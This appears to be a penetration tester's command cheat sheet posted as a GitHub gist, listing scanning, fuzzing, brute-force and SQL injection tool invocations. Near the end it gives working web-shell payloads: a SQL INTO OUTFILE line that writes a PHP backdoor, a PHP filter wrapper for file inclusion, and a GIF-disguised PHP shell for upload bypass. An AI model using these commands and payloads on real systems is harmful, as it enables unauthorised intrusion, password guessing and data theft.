Created
April 12, 2024 11:10
-
-
Save thevillagehacker/d74d3f8fbe30755838f556f7b1a9fd3b to your computer and use it in GitHub Desktop.
Notes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
######################## | |
COMMON COMMANDS | |
######################## | |
------------------------------------------------------------ | |
NMAP | |
------------------------------------------------------------ | |
nmap -p- -sT -sV -A $IP | |
nmap -p- -sC -sV $IP --open | |
nmap -p- --script=vuln $IP | |
nmap --script http-methods --script-args http-methods.url-path='/website' <target> | |
nmap -p80,443 --script=http-methods <ip> --script-args http-methods.url-path='/directory/goes/here' | |
nmap -p 139,445 -sC --script=smb-enum-shares <IP> | |
------------------------------------------------------------ | |
Sed IP's | |
------------------------------------------------------------ | |
grep -oE '((1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.){3}(1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])' FILE | |
------------------------------------------------------------ | |
WPScan | |
------------------------------------------------------------ | |
wpscan --url $URL --disable-tls-checks --enumerate p --enumerate t --enumerate u | |
wpscan --url $URL --disable-tls-checks -U users -P /usr/share/wordlists/rockyou.txt | |
wpscan --url $URL --enumerate p --plugins-detection aggressive | |
------------------------------------------------------------ | |
NIKTO | |
------------------------------------------------------------ | |
nikto --host $IP -ssl -evasion 1 | |
------------------------------------------------------------ | |
DNSrecon | |
------------------------------------------------------------ | |
dnsrecon –d yourdomain.com | |
------------------------------------------------------------ | |
Gobuster | |
------------------------------------------------------------ | |
gobuster dir -u $URL -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt -l -k -t 30 | |
gobuster dir -u $URL -w /opt/SecLists/Discovery/Web-Content/raft-medium-files.txt -l -k -t 30 | |
gobuster dns -d domain.org -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 30 | |
------------------------------------------------------------ | |
Extract IPs from text file | |
------------------------------------------------------------ | |
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' nmapfile.txt | |
------------------------------------------------------------ | |
Wfuzz | |
------------------------------------------------------------ | |
Wfuzz XSS Fuzzing | |
------------------------------------------------------------ | |
wfuzz -c -z file,/opt/SecLists/Fuzzing/XSS/XSS-BruteLogic.txt "$URL" | |
wfuzz -c -z file,/opt/SecLists/Fuzzing/XSS/XSS-Jhaddix.txt "$URL" | |
------------------------------------------------------------ | |
COMMAND INJECTION WITH POST DATA | |
------------------------------------------------------------ | |
wfuzz -c -z file,/opt/SecLists/Fuzzing/command-injection-commix.txt -d "doi=FUZZ" "$URL" | |
------------------------------------------------------------ | |
Test for Paramter Existence! | |
------------------------------------------------------------ | |
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/burp-parameter-names.txt "$URL" | |
------------------------------------------------------------ | |
AUTHENTICATED FUZZING DIRECTORIES | |
------------------------------------------------------------ | |
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt --hc 404 -d "SESSIONID=value" "$URL" | |
------------------------------------------------------------ | |
AUTHENTICATED FILE FUZZING: | |
------------------------------------------------------------ | |
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-medium-files.txt --hc 404 -d "SESSIONID=value" "$URL" | |
------------------------------------------------------------ | |
FUZZ Directories | |
------------------------------------------------------------ | |
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-large-directories.txt --hc 404 "$URL" | |
------------------------------------------------------------ | |
FUZZ FILES | |
------------------------------------------------------------ | |
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-large-files.txt --hc 404 "$URL" | |
------------------------------------------------------------ | |
LARGE WORDS | |
------------------------------------------------------------ | |
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-large-words.txt --hc 404 "$URL" | |
------------------------------------------------------------ | |
Users | |
------------------------------------------------------------ | |
wfuzz -c -z file,/opt/SecLists/Usernames/top-usernames-shortlist.txt --hc 404,403 "$URL" | |
------------------------------------------------------------ | |
Command Injection with commix, ssl, waf, random agent | |
------------------------------------------------------------ | |
commix --url="https://supermegaleetultradomain.com?parameter=" --level=3 --force-ssl --skip-waf --random-agent | |
------------------------------------------------------------ | |
SQLmap | |
------------------------------------------------------------ | |
sqlmap -u $URL --threads=2 --time-sec=10 --level=2 --risk=2 --technique=T --force-ssl | |
sqlmap -u $URL --threads=2 --time-sec=10 --level=4 --risk=3 --dump | |
------------------------------------------------------------ | |
ThHarvester | |
------------------------------------------------------------ | |
theharvester -d domain.org -l 500 -b google | |
------------------------------------------------------------ | |
SMTP Enumeration | |
------------------------------------------------------------ | |
smtp-user-enum -M VRFY -U /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -t $IP | |
smtp-user-enum -M EXPN -U /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -t $IP | |
smtp-user-enum -M RCPT -U /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -t $IP | |
smtp-user-enum -M EXPN -U /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -t $IP | |
------------------------------------------------------------ | |
TCP Monitor | |
------------------------------------------------------------ | |
tcpdump -i any -c5 icmp | |
------------------------------------------------------------ | |
Netdiscovery | |
------------------------------------------------------------ | |
netdiscover /r 0.0.0.0/24 | |
------------------------------------------------------------ | |
INTO OUTFILE Door | |
------------------------------------------------------------ | |
SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “/var/www/WEROOT/backdoor.php”; | |
------------------------------------------------------------ | |
LFI? => PHP Filter Checks | |
------------------------------------------------------------ | |
php://filter/convert.base64-encode/resource= | |
------------------------------------------------------------ | |
UPLOAD IMAGE? | |
------------------------------------------------------------ | |
"GIF89a1 | |
<?php system($_POST[""cmd""]); ?>" | |
------------------------------------------------------------ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment